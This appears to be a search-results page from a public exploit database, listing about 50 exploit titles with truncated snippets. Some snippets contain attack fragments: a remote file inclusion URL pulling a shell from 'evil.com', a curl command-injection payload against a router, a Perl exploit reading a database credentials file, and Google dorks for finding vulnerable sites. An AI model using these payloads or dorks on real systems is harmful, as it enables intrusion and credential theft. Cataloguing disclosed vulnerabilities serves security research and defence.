41207 matches found
Google Android 2.0 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222TCP)
Google Android 2.0 2.1 - Code Execution Reverse Shell 10.0.2.2:2222TCP // bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android : //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1...
Geeklog 2 - BaseView.php Remote File Inclusion
Geeklog 2 - BaseView.php Remote File Inclusion GeekLog = 2.× BaseView.php Remote File Include Vulnerabilities Discovered by GolDMMahmnoodali & & Contact: [email protected] URL: http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz V.CODE: In : path/system/libraries/Geeklog/MVCnPHP/BaseView.php...
FlashChat 4.5.7 - aedating4CMS.php Remote File Inclusion
FlashChat 4.5.7 - aedating4CMS.php Remote File Inclusion NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt?...
DUware DUpaypal 3.03.1 - sub.asp?iSub SQL Injection
DUware DUpaypal 3.03.1 - sub.asp?iSub SQL Injection source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. A successful exploit coul...
DUware DUclassmate 1.x - default.asp?iState SQL Injection
DUware DUclassmate 1.x - default.asp?iState SQL Injection source: https://www.securityfocus.com/bid/14036/info DUclassmate is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit...
Netlink GPON Router 1.0.11 - Remote Code Execution
Netlink GPON Router 1.0.11 - Remote Code Execution Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls...
Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow
Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow ''' ======================================================== Unauthenticated Stack Overflow in Multiple Gpon Devices ======================================================== . contents:: Table Of Content Overview ========...
jQuery-File-Upload 9.22.0 - Arbitrary File Upload
jQuery-File-Upload 9.22.0 - Arbitrary File Upload Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload Author: Larry W. Cashdollar, @larry0 Date: 2018-10-09 Vendor: https://github.com/blueimp Download Site: https://github.com/blueimp/jQuery-File-Upload/releases CVE-ID: N/A Vulnerability: The...
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow PoC Exploit Title: Delta Electronics Delta Industrial Automation COMMGR - Remote STACK-BASED BUFFER OVERFLOW Date: 02.07.2018 Exploit Author: t4rkd3vilz Vendor Homepage: http://www.deltaww.com/ Software Link:...
PHP PEAR 1.10.1 - Arbitrary File Download
PHP PEAR 1.10.1 - Arbitrary File Download + + Credits / Discovery: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt + ISR: ApparitionSEC + Vendor: ============ pear.php.net Product:...
WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery
WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery Advisory ID: HTB23206 Product: XCloner Wordpress plugin Vendor: XCloner Vulnerable Versions: 3.1.0 and probably prior Tested Version: 3.1.0 Advisory Publication: March 12, 2014 without technical details Vendor Notification: March 12, 201...
Linux Kernel 2.6.37 (RedHat Ubuntu 10.04) - Full-Nelson.c Local Privilege Escalation
Linux Kernel 2.6.37 RedHat Ubuntu 10.04 - Full-Nelson.c Local Privilege Escalation / Linux Kernel = 2.6.37 local privilege escalation by Dan Rosenberg @djrbliss on twitter Usage: gcc full-nelson.c -o full-nelson ./full-nelson This exploit leverages three vulnerabilities to get root, all of which...
Hampshire Trading Standards Script - SQL Injection
Hampshire Trading Standards Script - SQL Injection Title: Hampshire Trading Standards Script SQL Injection Vulnerability Version: 1.0 Author: Mr.P3rfekT Software Link:N/A Tested on Lunix CVE : N/A Founded By Mr.P3rfekT Dork : " inurl:tradeCategory.php?id= " Helllo Allz. Exploit :...
Chilkat Crypt - ActiveX Arbitrary File CreationExecution
Chilkat Crypt - ActiveX Arbitrary File CreationExecution ----------------------------------------------------------------------------- Chilkat Crypt Activex Component Arbitrary File Creation/Execution url: http://www.chilkatsoft.com File: ChilkatCrypt2.dll CLSID:...
TikiWiki 1.9.8 - tiki-graph_formula.php Command Execution
TikiWiki 1.9.8 - tiki-graphformula.php Command Execution !/usr/bin/perl TikiWiki $Id: milw0rmtikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $ use strict; use LWP::UserAgent; my $target = shift || &usage; my $proxy = shift; my $command; &exploit$target, "cat db/local.php", $proxy; print "? php...
Apache 1.3.372.0.592.2.3 mod_rewrite - Remote Overflow
Apache 1.3.372.0.592.2.3 modrewrite - Remote Overflow !/bin/sh Exploit for Apache modrewrite off-by-one. Vulnerability discovered by Mark Dowd. CVE-2006-3747 by jack 2006-08-20 Thx to xuso for help me with the shellcode. I suppose that you've the "RewriteRule kung/. $1" rule if not you must...
SoX - .wav Local Buffer Overflow
SoX - .wav Local Buffer Overflow //--------------------------------- Begin Code: sox-exploiter.c --------------------------------- / Copyright Rosiello Security 2004 http://www.rosiello.org CVE Reference: CAN-2004-0557 Bug Type: Stack Overflow Date: 01/08/2004 Ulf Harnhammar reported that there a...
VMWare Fusion - Local Privilege Escalation
VMWare Fusion - Local Privilege Escalation Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: VMware Fusion 10.1.3 9472307 on macOS 10.13.6 VMware Fusi...
OpenSMTPD 6.6.3 - Arbitrary File Read
OpenSMTPD 6.6.3 - Arbitrary File Read Title: OpenSMTPD 6.6.3 - Arbitrary File Read Date: 2020-02-20 Author: qualys Vendor: https://www.opensmtpd.org/ CVE: 2020-8793 / Local information disclosure in OpenSMTPD CVE-2020-8793 Copyright C 2020 Qualys, Inc. This program is free software: you can...
Centreon 19.10.5 - Remote Command Execution
Centreon 19.10.5 - Remote Command Execution Exploit Title: Centreon 19.10.5 - Remote Command Execution Date: 2020-01-27 Exploit Author: Fabien AUNAY, Omri BASO Vendor Homepage: https://www.centreon.com/ Software Link: https://github.com/centreon/centreon Version: 19.10.5 Tested on: CentOS 7 CVE :...
Listing Hub CMS 1.0 - pages.php id SQL Injection
Listing Hub CMS 1.0 - pages.php id SQL Injection Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection Google Dork: inurl:"pages.php?title=privacy-policy" Date: 14 Feb 2019 Exploit Author: Deyaa Muhammad Author EMail: contact at deyaa.me Author Blog: http://deyaa.me Vendor Homepage:...
MMonit 3.7.2 - Privilege Escalation
MMonit 3.7.2 - Privilege Escalation !/usr/env/python3 """ Vulnerability title: M/Monit = 3.7.2 - Privilege Escalation Author: Dolev Farhi Vulnerable version: 2.0.151021 Link: https://mmonit.com Date: 2/17/2019 """ import sys import requests MMONITURL = 'http://ip.add.re.ss:8080' MMONITUSER =...
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor clie_5_attach Nullpointer Dereference
Linux Kernel 3.10.0 CentOS RHEL 7.1 - visor clie5attach Nullpointer Dereference OS-S Security Advisory 2016-09 Linux visor clie5attach Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: CVE-2015-7566 CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...
Paddelberg Topsite Script - Authentication Bypass
Paddelberg Topsite Script - Authentication Bypass Exploit Title: Paddelberg's topsite-script admin auth bypass. Google Dork: intext:"powered by php scripte webmaster resource" Date: 8. 1. 2012 Author: Christian Inci Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/...
DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion
DZCP deV!Lz Clanportal 1.5.4 - Local File Inclusion Vulnerability ID: HTB22656 Reference: http://www.htbridge.ch/advisory/lfiindzcp.html Product: DZCP Vendor: dzcp.de http://www.dzcp.de Vulnerable Version: 1.5.4 Vendor Notification: 13 October 2010 Vulnerability Type: Local File Inclusion Status:...
AOL 9.5 - ActiveX Heap Spray
AOL 9.5 - ActiveX Heap Spray AOL 9.5 ActiveX 0day Exploit heap spray + AOL 9.5 ActiveX 0day Exploit heap spray + Author : Dzattacker + Discovered by: Hellcode Research http://www.hellcode.net + Reference: http://www.exploit-db.com/exploits/11190 + Tested on Windows Xp SP3 ,IE7 // win32exec - calc...
BIND 9.x - Remote DNS Cache Poisoning
BIND 9.x - Remote DNS Cache Poisoning / Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack Compilation: $ gcc -o kaminsky-attack kaminsky-attack.c dnet-config --libs -lm Dependency: libdnet aka libdumbnet-dev under Ubuntu Author: marc.bevand at rapid7 dot com / define BSDSOURCE inclu...
TikiWiki Project 1.8 - tiki-index.php?comments_offset offset SQL Injections
TikiWiki Project 1.8 - tiki-index.php?commentsoffset offset SQL Injections source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such ...
Sudo 1.8.25p - pwfeedback Buffer Overflow (PoC)
Sudo 1.8.25p - pwfeedback Buffer Overflow PoC Title: Sudo 1.8.25p - Buffer Overflow Date: 2020-01-30 Author: Joe Vennix Software: Sudo Versions: Sudo versions prior to 1.8.26 CVE: CVE-2019-18634 Reference: https://www.sudo.ws/alerts/pwfeedback.html Sudo's pwfeedback option can be used to provide...
Alcatel-Lucent Omnivista 8770 - Remote Code Execution
Alcatel-Lucent Omnivista 8770 - Remote Code Execution Exploit Title: Alcatel-Lucent Omnivista 8770 - Remote Code Execution Google Dork: inurl:php-bin/webclient.php Date: 2019-12-01 Author: 0x1911 Vendor Homepage: https://www.al-enterprise.com/ Software Link:...
FlexAir Access Control 2.4.9api3 - Remote Code Execution
FlexAir Access Control 2.4.9api3 - Remote Code Execution Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution Google Dork: NA Date: 2019-11-11 Exploit Author: LiquidWorm Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ Software Link:...
Huawei eSpace 1.1.11.103 - ContactsCtrl.dll eSpaceStatusCtrl.dll ActiveX Heap Overflow
Huawei eSpace 1.1.11.103 - ContactsCtrl.dll eSpaceStatusCtrl.dll ActiveX Heap Overflow Huawei eSpace Meeting ContactsCtrl.dll and eSpaceStatusCtrl.dll ActiveX Heap Overflow Vendor: Huawei Technologies Co., Ltd. Product web page: https://www.huawei.com Affected version: eSpace 1.1.11.103 aka eSpac...
McAfee ePO 5.9.1 - Registered Executable Local Access Bypass
McAfee ePO 5.9.1 - Registered Executable Local Access Bypass Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass Date: 2019-03-07 Exploit Author: @leonjza Vendor Homepage: https://www.mcafee.com/ Software Link:...
Dell Touchpad - ApMsgFwd.exe Denial of Service
Dell Touchpad - ApMsgFwd.exe Denial of Service / Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service Author: Souhail Hammou Vendor Homepage: https://www.alps.com/ Tested on : Alps Pointing-device Driver 10.1.101.207 CVE: CVE-2018-10828 / include include include / Details: ========== ApMsgFwd.ex...
OpenBSD - at Stack Clash Local Privilege Escalation
OpenBSD - at Stack Clash Local Privilege Escalation / OpenBSDat.c for CVE-2017-1000373 Copyright c 2017 Qualys, Inc. slowsort adapted from lib/libc/stdlib/qsort.c: Copyright c 1992, 1993 The Regents of the University of California. All rights reserved. Redistribution and use in source and binary...
Vanilla Forums 2.3 - Remote Code Execution
Vanilla Forums 2.3 - Remote Code Execution !/bin/bash / / / / / / / / / / / / / / / / / / // / / / /// / / / / // / // / // / / / / // / // , / / / ///, /,// // //,///||// // // Vanilla Forums = 2.3 Remote Code Execution RCE PoC Exploit 0day Core version no plugins, default config...
Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)
Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation MS16-135 2 / Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html Binary:...
Wildfly - WEB-INF META-INF Information Disclosure via Filter Restriction Bypass
Wildfly - WEB-INF META-INF Information Disclosure via Filter Restriction Bypass Exploit Title: Wildfly: WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass Date: 09.02.16 Exploit Author: Tal Solomon of Palantir Security Vendor Homepage:...
Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion
Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion Advisory ID: HTB23281 Product: bitrix.mpbuilder Bitrix module Vendor: www.1c-bitrix.ru Vulnerable Versions: 1.0.10 and probably prior Tested Version: 1.0.10 Advisory Publication: November 18, 2015 without technical details Vendor...
Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow
Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow Credit: Maksymilian Arciemowicz CXSECURITY Website: http://cxsecurity.com/ http://cert.cx/ Affected software: - MACOS's Commands such as: ls, find, rm -...
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection ============================================= - Release date: 29.10.2015 - Discovered by: Dawid Golunski - Severity: High/Critical - eBay Magento ref.: APPSEC-1045 ============================================= I. VULNERABILITY...
Joomla! Component JV Comment 3.0.2 - id SQL Injection
Joomla! Component JV Comment 3.0.2 - id SQL Injection Advisory ID: HTB23195 Product: JV Comment Joomla Extension Vendor: joomlavi.com Vulnerable Versions: 3.0.2 and probably prior Tested Version: 3.0.2 Advisory Publication: January 2, 2014 without technical details Vendor Notification: January 2,...
D-Link IP Cameras - Multiple Vulnerabilities
D-Link IP Cameras - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ D-Link IP Cameras Multiple Vulnerabilities 1. Advisory Information Title: D-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0303 Advisory URL:...
sudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation
sudo 1.8.0 1.8.3p1 - sudodebug glibc FORTIFYSOURCE Bypass + Privilege Escalation / death-star.c sudo v1.8.0-1.8.3p1 sudodebug format string root exploit + glibc FORTIFYSOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FORTIFYSOURCE format string...
toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities
toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities &redirectSecure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote:...
Linux Kernel 2.6.202.6.242.6.27_7-10 (Ubuntu 7.048.048.10 Fedora Core 10 OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow
Linux Kernel 2.6.202.6.242.6.277-10 Ubuntu 7.048.048.10 Fedora Core 10 OpenSuse 11.1 - SCTP FWD Memory Corruption Remote Overflow / CVE-2009-0065 SCTP FWD Chunk Memory Corruption Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit coded by: sgrakkyu antifork.org...
Comersus Cart 7.0.7 - comersus_optReviewReadExec.asp?id SQL Injection
Comersus Cart 7.0.7 - comersusoptReviewReadExec.asp?id SQL Injection source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or...
Microsoft Windows - GDI+ .ICO File Remote Denial of Service
Microsoft Windows - GDI+ .ICO File Remote Denial of Service Author : kad Mail : kadathighsecudotcom Site : http://www.highsecu.com highsecu.ico - Microsoft GDI+ Integer division by zero flaw handling .ICO files...
Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
Tautulli 2.1.9 - Cross-Site Request Forgery ShutDown Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery ShutDown Date: 2018-12-17 Exploit Author: Ismail Tasdelen Vendor Homepage: https://tautulli.com/ Software : https://github.com/Tautulli/Tautulli Product Version: v2.1.9 Platform: Window...
AppXSvc 17763 - Arbitrary File Overwrite (DoS)
AppXSvc 17763 - Arbitrary File Overwrite DoS Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite DoS Date: 2019-10-28 Exploit Author: Gabor Seljan Vendor Homepage: https://www.microsoft.com/ Version: 17763.1.amd64fre.rs5release.180914-1434 Tested on: Windows 10 Version 1809 for x64-based...